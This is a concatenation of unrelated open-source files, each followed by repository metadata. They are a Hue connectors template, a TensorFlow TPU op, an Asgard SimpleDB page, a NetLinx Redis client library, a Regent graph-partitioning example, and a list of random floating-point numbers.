## Licensed to Cloudera, Inc. under one ## or more contributor license agreements. See the NOTICE file ## distributed with this work for additional information ## regarding copyright ownership. Cloudera, Inc. licenses this file ## to you under the Apache License, Version 2.0 (the ## "License"); you may not use this file except in compliance ## with the License. You may obtain a copy of the License at ## ## http://www.apache.org/licenses/LICENSE-2.0 ## ## Unless required by applicable law or agreed to in writing, software ## distributed under the License is distributed on an "AS IS" BASIS, ## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. ## See the License for the specific language governing permissions and ## limitations under the License. <%! import sys from desktop.conf import CUSTOM from desktop.views import commonheader, commonfooter if sys.version_info[0] > 2: from django.utils.translation import gettext as _ else: from django.utils.translation import ugettext as _ %> <%namespace name="actionbar" file="../actionbar.mako" /> <%namespace name="layout" file="../about_layout.mako" /> ${ layout.menubar(section='connectors') } <div id="connectorsComponents"> <!-- ko component: { name: 'connectors-config' } --><!-- /ko --> </div> <script type="text/javascript"> $(document).ready(function () { ko.applyBindings({}, $('#connectorsComponents')[0]); }); </script>
Mako
3
yetsun/hue
desktop/core/src/desktop/templates/connectors/connectors.mako
[ "Apache-2.0" ]
/* Copyright 2020 The TensorFlow Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ==============================================================================*/ #include "tensorflow/core/framework/common_shape_fns.h" #include "tensorflow/core/framework/op.h" #include "tensorflow/core/framework/shape_inference.h" #include "tensorflow/core/lib/core/status.h" namespace tensorflow { using shape_inference::InferenceContext; using shape_inference::ShapeHandle; REGISTER_OP("TPUPartitionedOutput") .Input("inputs: T") .Output("output: num_splits * T") .Attr("T: type") .Attr("num_splits: int >= 1") .Attr("partition_dim: int = 0") .SetShapeFn([](InferenceContext* c) { DataType dtype; TF_RETURN_IF_ERROR(c->GetAttr("T", &dtype)); int partition_dim; TF_RETURN_IF_ERROR(c->GetAttr("partition_dim", &partition_dim)); int num_splits; TF_RETURN_IF_ERROR(c->GetAttr("num_splits", &num_splits)); if (dtype == DT_RESOURCE) { return errors::Unimplemented("Not implemented."); } ShapeHandle input = c->input(0); ShapeHandle newoutput0; shape_inference::DimensionHandle new_dim; TF_RETURN_WITH_CONTEXT_IF_ERROR( c->Divide(c->Dim(input, partition_dim), num_splits, true /* evenly_divisible */, &new_dim), "Number of ways to split should evenly divide the split dimension"); TF_CHECK_OK(c->ReplaceDim(input, partition_dim, new_dim, &newoutput0)); for (int i = num_splits - 1; i >= 0; --i) { c->set_output(i, newoutput0); } return Status::OK(); }); } // namespace tensorflow
C++
5
yage99/tensorflow
tensorflow/core/tpu/ops/tpu_partitioned_output_op.cc
[ "Apache-2.0" ]
<%-- Copyright 2012 Netflix, Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --%> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="layout" content="main"/> <title>${domainName} SimpleDB Domain</title> </head> <body> <div class="body"> <h1>SimpleDB Domain Metadata</h1> <g:if test="${flash.message}"> <div class="message">${flash.message}</div> </g:if> <div class="buttons"> <g:form action="delete"> <input type="hidden" name="id" value="${domainName}"/> <g:buttonSubmit class="delete" action="delete" value="Delete SimpleDB Domain" data-warning="Really delete SimpleDB Domain '${domainName}'?" /> </g:form> </div> <div> <table> <tbody> <tr class="prop"> <td class="name">Domain Name:</td> <td class="value">${domainName}</td> </tr> <tr class="prop" title="The number of all items in the domain"> <td class="name">Item Count:</td> <td class="value">${domainMetadata.itemCount}</td> </tr> <tr class="prop" title="The total size of all item names in the domain"> <td class="name">Item Names Size:</td> <td class="value">${domainMetadata.itemNamesSize}</td> </tr> <tr class="prop" title="The number of unique attribute names in the domain"> <td class="name">Attribute Name Count:</td> <td class="value">${domainMetadata.attributeNameCount}</td> </tr> <tr class="prop" title="The total size of all unique attribute names in the domain"> <td class="name">Attribute Names Size:</td> <td class="value">${domainMetadata.attributeNamesSize}</td> </tr> <tr class="prop" title="The number of all attribute name/value pairs in the domain"> <td class="name">Attribute Value Count:</td> <td class="value">${domainMetadata.attributeValueCount}</td> </tr> <tr class="prop" title="The total size of all attribute values in the domain"> <td class="name">Attribute Values Size:</td> <td class="value">${domainMetadata.attributeValuesSize}</td> </tr> </tbody> </table> </div> </div> </body> </html>
Groovy Server Pages
3
michaelneale/asgard
grails-app/views/domain/show.gsp
[ "Apache-2.0" ]
(*********************************************************** amx-lib-redis v0.1.0 A Redis database client for AMX's NetLinx programming language. Redis Comamnds: http://redis.io/commands Redis Protocol Specification: http://redis.io/topics/protocol ************************************************************ The MIT License (MIT) Copyright (c) 2015 Alex McLain Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ************************************************************) #if_not_defined AMX_LIB_REDIS #define AMX_LIB_REDIS 1 (***********************************************************) (* System Type : NetLinx *) (***********************************************************) (* DEVICE NUMBER DEFINITIONS GO BELOW *) (***********************************************************) DEFINE_DEVICE (***********************************************************) (* CONSTANT DEFINITIONS GO BELOW *) (***********************************************************) DEFINE_CONSTANT REDIS_DEFAULT_PORT = 6379; // Error codes. REDIS_SUCCESS = 0; REDIS_ERR_INCORRECT_TYPE = 1; (***********************************************************) (* INCLUDES GO BELOW *) (***********************************************************) (***********************************************************) (* DATA TYPE DEFINITIONS GO BELOW *) (***********************************************************) DEFINE_TYPE (***********************************************************) (* VARIABLE DEFINITIONS GO BELOW *) (***********************************************************) DEFINE_VARIABLE (***********************************************************) (* SUBROUTINE/FUNCTION DEFINITIONS GO BELOW *) (***********************************************************) /* * Connect to a Redis server. * port can be set to REDIS_DEFAULT_PORT. */ define_function integer redis_connect(dev socket, char ip[], integer port) { ip_client_open(socket.port, ip, port, IP_TCP); // TODO: Error handling. return REDIS_SUCCESS; } /* * Get the value of a key. * http://redis.io/commands/get */ define_function integer redis_get(dev socket, char key[]) { return _redis_send_command_2(socket, 'GET', key); } /* * Set the string value of a key. * http://redis.io/commands/set */ define_function integer redis_set(dev socket, char key[], char value[]) { return _redis_send_command_3(socket, 'SET', key, value); } /* * Subscribes the client to the specified channel. * http://redis.io/commands/subscribe */ define_function integer redis_subscribe(dev socket, char channel[]) { return _redis_send_command_2(socket, 'SUBSCRIBE', channel); } /* * Subscribes the client to the given pattern. * http://redis.io/commands/psubscribe */ define_function integer redis_psubscribe(dev socket, char pattern[]) { return _redis_send_command_2(socket, 'PSUBSCRIBE', pattern); } /* * Unsubscribes the client from the given channel. * http://redis.io/commands/unsubscribe */ define_function integer redis_unsubscribe(dev socket, char channel[]) { return _redis_send_command_2(socket, 'UNSUBSCRIBE', channel); } /* * Unsubscribes the client from all channels. * http://redis.io/commands/unsubscribe */ define_function integer redis_unsubscribe_all(dev socket) { return _redis_send_command_1(socket, 'UNSUBSCRIBE'); } /* * Unsubscribes the client from the given pattern. * http://redis.io/commands/punsubscribe */ define_function integer redis_punsubscribe(dev socket, char pattern[]) { return _redis_send_command_2(socket, 'PUNSUBSCRIBE', pattern); } /* * Unsubscribes the client from all patterns. * http://redis.io/commands/punsubscribe */ define_function integer redis_punsubscribe_all(dev socket) { return _redis_send_command_1(socket, 'PUNSUBSCRIBE'); } /* * Posts a message to the given channel. * http://redis.io/commands/publish */ define_function integer redis_publish(dev socket, char channel[], char message[]) { return _redis_send_command_3(socket, 'PUBLISH', channel, message); } /* * Marks the start of a transaction block. Subsequent commands will be queued * for atomic execution using EXEC. * http://redis.io/commands/multi */ define_function integer redis_multi(dev socket) { return _redis_send_command_1(socket, 'MULTI'); } /* * Executes all previously queued commands in a transaction and restores the * connection state to normal. * http://redis.io/commands/exec */ define_function integer redis_exec(dev socket) { return _redis_send_command_1(socket, 'EXEC'); } /* * Flushes all previously queued commands in a transaction and restores the * connection state to normal. If WATCH was used, DISCARD unwatches all keys * watched by the connection. * http://redis.io/commands/discard */ define_function integer redis_discard(dev socket) { return _redis_send_command_1(socket, 'DISCARD'); } /* * Marks the given keys to be watched for conditional execution of a transaction. * http://redis.io/commands/watch */ define_function integer redis_watch(dev socket, char key[]) { return _redis_send_command_2(socket, 'WATCH', key); } /* * Flushes all the previously watched keys for a transaction. * If you call EXEC or DISCARD, there's no need to manually call UNWATCH. * http://redis.io/commands/unwatch */ define_function integer redis_unwatch(dev socket) { return _redis_send_command_1(socket, 'UNWATCH'); } /* * Parses an OK response packet. * packet - Response from the server. */ define_function integer redis_parse_ok(char packet[]) { if ( compare_string(packet, "'+OK', $0D, $0A") == 1 || compare_string(packet, "'*1', $0D, $0A, '+OK', $0D, $0A") == 1 ) { return REDIS_SUCCESS; } return REDIS_ERR_INCORRECT_TYPE; } /* * Parses a nil response packet. * packet - Response from the server. */ define_function integer redis_parse_nil(char packet[]) { if (compare_string(packet, "'*-1', $0D, $0A") == 1) { return REDIS_SUCCESS; } return REDIS_ERR_INCORRECT_TYPE; } /* * Parses a QUEUED response packet. * packet - Response from the server. */ define_function integer redis_parse_queued(char packet[]) { if (compare_string(packet, "'+QUEUED', $0D, $0A") == 1) { return REDIS_SUCCESS; } return REDIS_ERR_INCORRECT_TYPE; } /* * Parses a bulk string from a response packet. * packet - Response from the server. * bulk_string - Buffer to store the value. */ define_function integer redis_parse_bulk_string(char packet[], char bulk_string[]) { integer pos; if (length_string(packet) < 1 || packet[1] != '$') { return REDIS_ERR_INCORRECT_TYPE; // Not bulk string. } bulk_string = ''; pos = _redis_parse_string_frame(packet, bulk_string, 1); return REDIS_SUCCESS; } /* * Parses a pub/sub message from a response packet. * packet - Response from the server. * channel - Buffer to store the channel name. * message - Buffer to store the message. */ define_function integer redis_parse_message(char packet[], char channel[], char message[]) { integer pos; char header[255]; char trash[255]; // Check for standard message. header = "'*3', $0D, $0A, '$7', $0D, $0A, 'message', $0D, $0A"; if ( length_string(packet) > length_string(header) && compare_string(left_string(packet, length_string(header)), header) == 1 ) { channel = ''; message = ''; pos = _redis_parse_string_frame(packet, channel, length_string(header) + 1); pos = _redis_parse_string_frame(packet, message, pos + 1); return REDIS_SUCCESS; } // Check for pmessage. header = "'*4', $0D, $0A, '$8', $0D, $0A, 'pmessage', $0D, $0A"; if ( length_string(packet) > length_string(header) && compare_string(left_string(packet, length_string(header)), header) == 1 ) { channel = ''; message = ''; pos = _redis_parse_string_frame(packet, trash, length_string(header) + 1); // Throw away subscription pattern. pos = _redis_parse_string_frame(packet, channel, pos + 1); pos = _redis_parse_string_frame(packet, message, pos + 1); return REDIS_SUCCESS; } return REDIS_ERR_INCORRECT_TYPE; // Not pub/sub message. } /* * Send a command to the Redis server. * socket - TCP connection to the Redis server. * args - Array of strings to send. * * Note: send_string can only transmit 16,000 bytes. */ define_function integer _redis_send_command(dev socket, char args[][]) { integer i, len; char packet[16000]; // send_string can only transmit 16,000 bytes. packet = "'*', itoa(max_length_array(args)), $0D, $0A"; // Frame size. for (i = 1, len = max_length_array(args); i <= len; i++) { packet = "packet, '$', itoa(length_string(args[i])), $0D, $0A"; // String length. packet = "packet, args[i], $0D, $0A"; // String content. } send_string socket, packet; return REDIS_SUCCESS; } /* * Send a command with one argument to the Redis server. * Example: "unsubscribe" */ define_function integer _redis_send_command_1(dev socket, char arg1[]) { send_string socket, " '*1', $0D, $0A, '$', itoa(length_string(arg1)), $0D, $0A, arg1, $0D, $0A "; return REDIS_SUCCESS; } /* * Send a command with two arguments to the Redis server. * Example: "get key" */ define_function integer _redis_send_command_2(dev socket, char arg1[], char arg2[]) { send_string socket, " '*2', $0D, $0A, '$', itoa(length_string(arg1)), $0D, $0A, arg1, $0D, $0A, '$', itoa(length_string(arg2)), $0D, $0A, arg2, $0D, $0A "; return REDIS_SUCCESS; } /* * Send a command with three arguments to the Redis server. * Example: "set key 10" */ define_function integer _redis_send_command_3(dev socket, char arg1[], char arg2[], char arg3[]) { send_string socket, " '*3', $0D, $0A, '$', itoa(length_string(arg1)), $0D, $0A, arg1, $0D, $0A, '$', itoa(length_string(arg2)), $0D, $0A, arg2, $0D, $0A, '$', itoa(length_string(arg3)), $0D, $0A, arg3, $0D, $0A "; return REDIS_SUCCESS; } /* * Parses a string from a Redis response packet. * packet - Response from the server. * output - Buffer to hold the parsed string. * start - Offset to start parsing. * Returns the position of the last byte of the frame. */ define_function integer _redis_parse_string_frame(char packet[], char output[], long start) { integer start_pos, end_pos, length; output = ''; start_pos = find_string(packet, '$', start); end_pos = find_string(packet, "$0D", start_pos); length = atoi(mid_string(packet, start_pos, end_pos - start_pos)); output = mid_string(packet, end_pos + 2, length); return end_pos + length + 3; } (***********************************************************) (* STARTUP CODE GOES BELOW *) (***********************************************************) DEFINE_START (***********************************************************) (* THE EVENTS GO BELOW *) (***********************************************************) DEFINE_EVENT (***********************************************************) (* THE MAINLINE GOES BELOW *) (***********************************************************) DEFINE_PROGRAM (***********************************************************) (* END OF PROGRAM *) (* DO NOT PUT ANY CODE BELOW THIS COMMENT *) (***********************************************************) #end_if
NetLinx
4
amclain/amx-lib-redis
amx-lib-redis.axi
[ "MIT" ]
-- Copyright 2016 Stanford University -- -- Licensed under the Apache License, Version 2.0 (the "License"); -- you may not use this file except in compliance with the License. -- You may obtain a copy of the License at -- -- http://www.apache.org/licenses/LICENSE-2.0 -- -- Unless required by applicable law or agreed to in writing, software -- distributed under the License is distributed on an "AS IS" BASIS, -- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -- See the License for the specific language governing permissions and -- limitations under the License. import "regent" local c = regentlib.c fspace Node { id: int64 } fspace Edge(r: region(Node)) { source_node : ptr(Node, r), dest_node: ptr(Node, r) } task main() var Num_Parts = 4 var Num_Elements = 20 var nodes = region(ispace(ptr, Num_Elements), Node) var edges = region(ispace(ptr, Num_Elements), Edge(nodes)) for i = 0, Num_Elements do var node = new(ptr(Node, nodes)) node.id = i end for n in nodes do for m in nodes do if m.id == n.id + 1 then var edge = new(ptr(Edge(nodes), edges)) edge.source_node = n edge.dest_node = m end end end var colors = ispace(int1d, Num_Parts) var edge_partition = partition(equal, edges, colors) for color in edge_partition.colors do c.printf("Edge subregion %d: ", color) for e in edge_partition[color] do c.printf("(%d,%d) ", e.source_node.id, e.dest_node.id) end c.printf("\n") end var node_partition1 = image(nodes, edge_partition, edges.dest_node) var node_partition2 = image(nodes, edge_partition, edges.source_node) -- -- Keep those source nodes of edges that -- are not also destination nodes. -- var node_partition = node_partition2 - node_partition1 for color in node_partition.colors do c.printf("Node subregion %d: ", color) for n in node_partition[color] do c.printf("%d ", n.id) end c.printf("\n") end end regentlib.start(main)
Rouge
3
StanfordLegion/bootcamp2017
DependentPartitioning/5.rg
[ "Apache-2.0" ]
0.38572172740397104 0.753172511022528 0.7572025086773071 0.6375406381514317 0.051238366943649916 0.8934399924248659 0.9643780573830937 0.028162091255060417 0.2778793894588396 0.5704608364596863 0.5397058058028547 0.22072770891610438 0.4027735515767188 0.5595802373475535 0.45644484025650955 0.18603062502177115 0.12563766243741603 0.12267051807728957 0.799625891918466 0.4587689501008698 0.663040997167715 0.26375428824740765 0.555530488884921 0.48900320691866395 0.5962776058441203 0.3143089288422348 0.37779626316672577 0.28991776619709075 0.17260960616479026 0.47437946519018237 0.30462571009631334 0.10012534909340431 0.1592251854223049 0.027966810292522903 0.7280818002508053 0.4970672024979068 0.9277287245324198 0.06980688492644282 0.7938040011797 0.7238776120717728 0.9340744295664959 0.25578595435615203 0.48565185087841667 0.2829064682997634 0.15032687884633322 0.2695810870901355 0.8686970339808815 0.17020188147869586 0.37727287020723566 0.2618143108455032 0.6768872261278103 0.02065958081520558 0.7788801419858117 0.37149911307720096 0.0810960173076577 0.6530471619291237 0.5979773232550022 0.6095738278589088 0.32315656669284465 0.3963727899269591 0.8945711724566509 0.23435809007536046 0.5540017773870668 0.6363864068931904 0.2839198514467026 0.7350758580376877 0.11986708327695539 0.40925335850122024 0.18686375316637405 0.31733359104088965 0.9554357809587202 0.7453976478700539 0.5378115810729628 0.7818817239730596 0.6423814163525094 0.484874146261596 0.18403137580772 0.40790718961100625 0.9432304439149966 0.7163316055872326 0.768222435307817 0.9667611995042461 0.7762368162378311 0.29733194034539545 0.4100545376396625 0.8657672590180439 0.6052234080352381 0.39158040339933253 0.44416194880410265 0.7619913444602191 0.8078616412554644 0.6605535264252226 0.6069402480133259 0.40654402103088316 0.9786386486077757 0.5103883064860981 0.9478402698054539 0.5010247443267039 0.5079454624938238 0.7847069408285395 0.6846656581731615 0.7622946918676896 0.4340424262922391 0.5454827052582706 0.9086647908199933 0.053898381310959476 0.0026433257479805405 0.07416717273180551 0.6710414796679952 0.7872799029110799 0.9927539152197641 0.21799342445957626 0.878994617888742 0.63438144546674 0.23401764603142827 0.6274178420620345 0.14745775635618363 0.6577477582854147 0.7735315449606045 0.7872355882322338 0.6188423389502515 0.9013078960073965 0.4021568123378345 0.6326679328677282 0.19314108909103056 0.3113552215778148 0.9923288758146922 0.8732169331530663 0.58848303504155 0.48223082051361543 0.10986420307591449 0.736865709943011 0.1559505410039167 0.7235776903674686 0.5502290108482407 0.0877665816155041 0.14185537077109112 0.928146056756073 0.17603689160823421 0.2383494169560093 0.4577656516790545 0.7338326451139179 0.6706304038434981 0.9747557562279853 0.1890193023052129 0.7592456304178261 0.2047834356754914 0.773876088163155 0.7854975595167452 0.1990330849082833 0.9555113939907617 0.6278078111736376 0.9194624274522738 0.3024761203149241 0.574801455097247 0.025428981924678573 0.2780918852883224 0.821905014890802 0.3584357799717526 0.9661317996954554 0.8607879549768894 0.14602111597573253 0.495004588059761 0.5489304859550705 0.5349882635407096 0.4841607793456584 0.20836421404524386 0.6596256892387548 0.47477201561360216 0.42263440638654315 0.3735816681930286 0.8722501987686695 0.5744984600523212 0.8317241942414721 0.9910345277766139 0.9818454685551227 0.09968069202291041 0.05786647777048115 0.167712107166352 0.03326333628949241 0.17042386092389017 0.5147811531813137 0.6223512353460946 0.621442865536726 0.963843087100182 0.24186112188325004 0.6070200550488462 0.18858942682675894 0.06606823150258234 0.8794023675702602 0.48222968153233636 0.7479794754719634 0.701264875994632 0.8157150105694662 0.08418398348602585 0.8615824463452484 0.09613194379117695 0.14303156198651312 0.19798477452859897 0.7774001618627034 0.10510274365258099 0.7160096103926739 0.6177854523503932 0.1657697486187909 0.7850875330668715 0.11302665799232392 0.2971111921061792 0.6810332547781981 0.610958367997065 0.7835678600414285 0.6710718302394763 0.6333155880640431 0.29236754846917024 0.08672943212519513 0.37855827344455306 0.3980416405037691 0.7937397120651289 0.7332154753856044 0.45080428005468376 0.62257833300041 0.1122322702540669 0.5165941272522416 0.6973718537508987 0.31753166273396216 0.6575720578003548 0.2544647464182763 0.4087287114335303 0.046636661174600635 0.87800786978429 0.6847342764489435 0.4186474372447123 0.4469081097734161 0.38414424712492345 0.36219150605001615 0.5371082728598471 0.22241360471214344 0.5356218032208995 0.24288459209217295 0.5658014465964128 0.4481214098181211 0.8738045796632418 0.7377851467720752 0.44348989850217235 0.7671700973161933 0.9656355542800947 0.7657976687164528 0.003893022243733335 0.498183347835504 0.4266119256856711 0.6071176999269721 0.6874032323576467 0.09639490081191249 0.31997690474430895 0.09266588541375997 0.6864553064078687 0.26910150061925775 0.23364120522546972 0.8035782425687747 0.24797926020702443 0.8906130532801805 0.7614893888852797 0.43814866268602515 0.045156921400652195 0.33544645022330744 0.7972672505762345 0.8955304412919679 0.8488776499669979 0.3195593348090018 0.41292271916445833 0.6322439717873163 0.7898466898213956 0.2350321275501004 0.02419235436901268 0.015460633073437924 0.42482903789642024 0.42019922644032914 0.6047059683371387 0.6310763563260935 0.388470557181097 0.020823541192806605 0.6051504688647555 0.7986574009675762 0.9873948165041095 0.9232448875636637 0.9804987745586872 0.4017511883727639 0.04869779690161602 0.5649242554737817 0.6415778315678792 0.37353595474514556 0.2160624684118977 0.8299618729277146 0.9335574748090966 0.6582747199967255 0.6387724521131414 0.7135927924030625 0.42802926542873443 0.3423410594197731 0.5454363278397656 0.1035927667052512 0.3991870539065946 0.8671069915094105 0.03814136850457406 0.5862941587341655 0.08225276349289112 0.2977374998443363 0.3325820882401994 0.16942099785009623 0.7059565318491815 0.8673503122464938 0.1849434083238537 0.23865398709499308 0.6064014286391453 0.5170770985350349 0.545426920473382 0.6081867897583105 0.11159944659155563 0.677171730226582 0.1584947984630931 0.1819376488889054 0.42084838453826345 0.9772182753892287 0.8674863913246927 0.5286512050820651 0.390659635914801 0.3679251360406899 0.9860509858644386 0.42916647433927246 0.3425762744035291 0.12246172659599286 0.4352849704870425 0.925119824476912 0.5211202449346032 0.8358801328689529 0.36649648176976246 0.19225597232843095 0.4703177179690746 0.3778179670902817 0.37231198480037664 0.2901517417812083 0.3715260666750341 0.40642945701068856 0.4596401826789738 0.9526875702068821 0.23884419302266902 0.9624754816030219 0.4049062697270315 0.26761508408192447 0.2708473160724515 0.7275418065386239 0.998862791089462 0.999764785016244 0.42297460124377273 0.773969952934249 0.9639020834195521 0.9419871670324985 0.5170211235699709 0.7504140258652126 0.7157562817231287 0.10548152751590534 0.8622643702711248 0.7916030307598145 0.33364454704880486 0.5771985704652856 0.8134173416488196 0.8322245300843045 0.14676124596017148 0.5643895283281528 0.306582727450713 0.6457113081552887 0.7066931768645242 0.4095566461446575 0.8876474823906416 0.4543958423502815 0.4219855934488015 0.9774534903729847 0.44451179008092 0.7546812521478161 0.42675755249524894 0.42593796900819136 0.46902986229446775 0.6787524484740599 0.6268199926804005 0.01698019908008752 0.643681939727228 0.5914752774281071 0.9439216744693176 0.022462791220133282 0.5342719516854579 0.045494726368259464 0.9059281896409218 0.07123523963956868 0.726600676645088 0.5834585649166841 0.9619694205303766 0.5187819746200469 0.005244340328692254 0.5307019767580806 0.26139070264968434 0.5179636915221019 0.6502250175792154 0.8408575315866755 0.8449093470642601 0.25851194424415613 0.32011034261540205 0.37294479233584354 0.4059944021636852 0.30661150943437154 0.3202201436923241 0.3505118896043914 0.5730994491006532 0.7279512346450793 0.18148433003767073 0.059986801147645874 0.956336180630203 0.7203677911202458 0.6070438704037169 0.9937400055486014 0.851447921118443 0.3134425554642576 0.14151690563147923 0.033687551570072194 0.045192024801028685 0.1277476166331868 0.056468159285308794 0.5686991145579819 0.04273813532638149 0.1958838981061254 0.10187525083339943 0.6045086980371411 0.0385173879172348 0.4480697427134446 0.10653740880292484 0.07542607940379997 0.8959304131938145 0.9508012138289806 0.4453356626427297 0.9569933979324416 0.9233141486069821 0.9844314070243902 0.9501816689207162 0.17101487010169025 0.22082939622120035 0.9039778207367802 0.8722406380708496 0.026043214838539996 0.5988530600119012 0.5269904056313753 0.39327030597239465 0.47604383929366545 0.8093604422225669 0.4288267259246812 0.6568820046125432 0.47944630360486706 0.20215527486577078 0.7343201227837507 0.7694832676604602 0.36258153105034163 0.3693091287864214 0.9276091296931138 0.44900100423124356 0.7955892465646971 0.39690599508534197 0.36608048258000114 0.622917780179937 0.556936364543389 0.9606549338164704 0.15600898041086564 0.08409554255935336 0.6943245762817059 0.008190810391815684 0.4667495999172261 0.4581776151460484 0.8373987161705921 0.33215646340891236 0.604860825645391 0.3883100201884855 0.6483013130283197 0.854312884419538 0.8343789917742312 0.27325486766592133 0.8333023670557838 0.732566122046978 0.6768995683440273 0.5895163836859912 0.6524804961487475 0.7096314137175829 0.7093455968237988 0.27301263301387746 0.3938648492855916 0.48468072882625934 0.800984417521576 0.22898957232527628 0.9762405966325746 0.4834320690034901 0.7128372549556419 0.3834306800506082 0.5718213573278679 0.2673798124254586 0.6377331946500545 0.9505517469835815 0.6726775212118373 0.5588913141981634 0.20278897162774412 0.9760580751667831 0.6962606038777032 0.9799824362685159 0.8899299199188758 0.5496747787170233 0.024688709066167824 0.06013767083666133 0.08956889803646417 0.9754442795008298 0.4429284008668545 0.6480165867096676 0.368662526254376 0.1679164227600657 0.3898398859474266 0.13948571117644692 0.8440991095877471 0.5772242537658622 0.5841876230829978 0.8167157301338948 0.05659138163165134 0.057639063408234215 0.7940720787053888 0.899286300947885 0.634609744542848 0.35609838824212925 0.9086002217676878 0.4083275839199696 0.7583713931094439 0.3046381057025147 0.8096902827080634 0.21311719682926 0.7437334690193196 0.7571218425461482 0.23397116747717284 0.9414997969763237 0.28381796989437147 0.5417149909575172 0.31950571087637225 0.13352692183743053 0.5497657396978445 0.9074564750603972 0.21679679443857824 0.17239819069362494 0.9186015332243403 0.6893599902981014 0.8135509540077569 0.7488209355077602 0.21572296908573863 0.35877959065777076 0.22940561073008492 0.19218035387413757 0.3680394155093226 0.7492010314901 0.9896717747984841 0.23232460614746353 0.9391387613315549 0.746011268791343 0.9484301229425521 0.26585680882265184 0.48297371810865064 0.7406319599602891 0.9560419761990336 0.4256785398029853 0.5354719258064573 0.4312197922710893 0.7584515360779497 0.9955182320664407 0.47123835272308623 0.45012572087834557 0.030548155579990244 0.828403318258102 0.36846465399725914 0.457936139476124 0.8271857709015664 0.8654587095340966 0.42603266319606614 0.150085269457785 0.6449379697443639 0.12377378209466572 0.9694614604361329 0.6623163151286265 0.8099412701668918 0.03878129687986287 0.3267165645994128 0.4724852368689709 0.7876914928202859 0.3314433027431629 0.6984992416707155 0.5102800047052344 0.5253664338164218 0.5461967588910764 0.848267358153286 0.683401200959085 0.5192175841178542 0.07905315680229519 0.8483321404413191 0.3452124197920585 0.0531428236902437 0.2633273271020352 0.6634656845499719 0.10388296576339628 0.0919491869910729 0.38931813022163786 0.5670892956014584 0.3822390837072458 0.32925811862945975 0.4224844668906872 0.5171865379295132 0.4446331133271776 0.607695458588392 0.04751202712062752 0.43815011823731775 0.74049037500623 0.9367769592175742 0.892364601807003 0.2726407752399487 0.9064609556851311 0.4564187690041621 0.5828876518297702 0.6061766853776474 0.6503058122743822 0.41809552903284253 0.18679839377631036 0.36708247103001834 0.7245203524947057 0.27651546700618623 0.06861800925448613 0.26009647530010804 0.48321962582685085 0.09677454456660639 0.7276008025670978 0.1277514318148507 0.6791406687674881 0.3617660018477409 0.614804288007999 0.371791151929574 0.2982909218736328 0.3899396053818386 0.5801206350619679 0.5150507175803373 0.42498234705803184 0.24208047266655341 0.9273923528754642 0.9191897484387744 0.8958909466166942 0.4301718291204435 0.4966028071827746 0.1521351130878359 0.3545328043075895 0.5718166734351329 0.08511594449195048 0.5699231978633928 0.16655278253542882 0.9358648819828741 0.9761315339485456 0.4128085182235848 0.027552128373896978 0.9522850075934594 0.010447931777671782 0.03096719675582693 0.03254486150884861 0.9370659028675453 0.9295823957468403 0.18271311153036018 0.8054315544540741 0.5107577653618536 0.8213006265674556 0.040886012600879984 0.46219277268655956 0.7760379680571741 0.7543258425972952 0.10188596469657263 0.011070978394637332 0.5225198439318312 0.5651898677824317 0.8481723311694497 0.020245611240881534 0.43121758904714425 0.7483888185461601 0.8637069487826015 0.041065880880589156 0.3078114677066487 0.47277169404917907 0.06580734781077946 0.6950559410582492 0.1906855289473054 0.7495582730206478 0.1790528903173807 0.8093727335539249 0.8610333865677204 0.4769902953061772 0.3490535927809586 0.11792786237540831 0.7390127495231632 0.6706565044607367 0.14019450796998079 0.9163213744808268 0.3966699045069433 0.3307010788342625 0.5819994979509938 0.4763571959418931 0.7209175240406916 0.6061439857614294 0.7081097246525314 0.7773044767853018 0.09715150381421378 0.10074543472464936 0.2408089409246249 0.7854460050012402 0.663250245202937 0.8484992380565163 0.14291227403953444 0.14941454520995134 0.5539769014496497 0.68349126872789 0.819138040492137 0.1905696462236771 0.5120566070696235 0.6652370464840933 0.5944363908810267 0.42463072206051233 0.7101849337666175 0.8801932747355657 0.299680772115281 0.03340831855660353 0.49574197893514327 0.3029612537421059 0.4799288833666041 0.78788539099713 0.7510208273552359 0.9195001765162322 0.19040864812251934 0.96294281354492 0.2004567035796645 0.19256664282407288 0.16489919366711425 0.3233571488392277 0.5118304463611297 0.011564672330359183 0.3715474884551684 0.5589886267969707 0.6669962832477572 0.1441356870698316 0.2665969956866937 0.05235957324566487 0.6388686590143411 0.23773458763984257 0.4393319774078822 0.6372481859041331 0.6444525290348375 0.6133601207387209 0.9167410211403392 0.5428156878371325 0.8309786705957579 0.5568570194256609 0.5305088759181723 0.6432011722165094 0.5076530210728669 0.6124052831181875 0.773794354974986 0.5889149883635196 0.22924426859426572 0.4138985165460718 0.10426161840596626 0.1815029548087591 0.9987765869697028 0.8828175495232576 0.5016173282039849 0.04462260971354892 0.5814034528522944 0.7512376688157949 0.8748084211654904 0.0207845174492558 0.9810762701423058 0.5078897009201732 0.167369245929485 0.04921460413980783 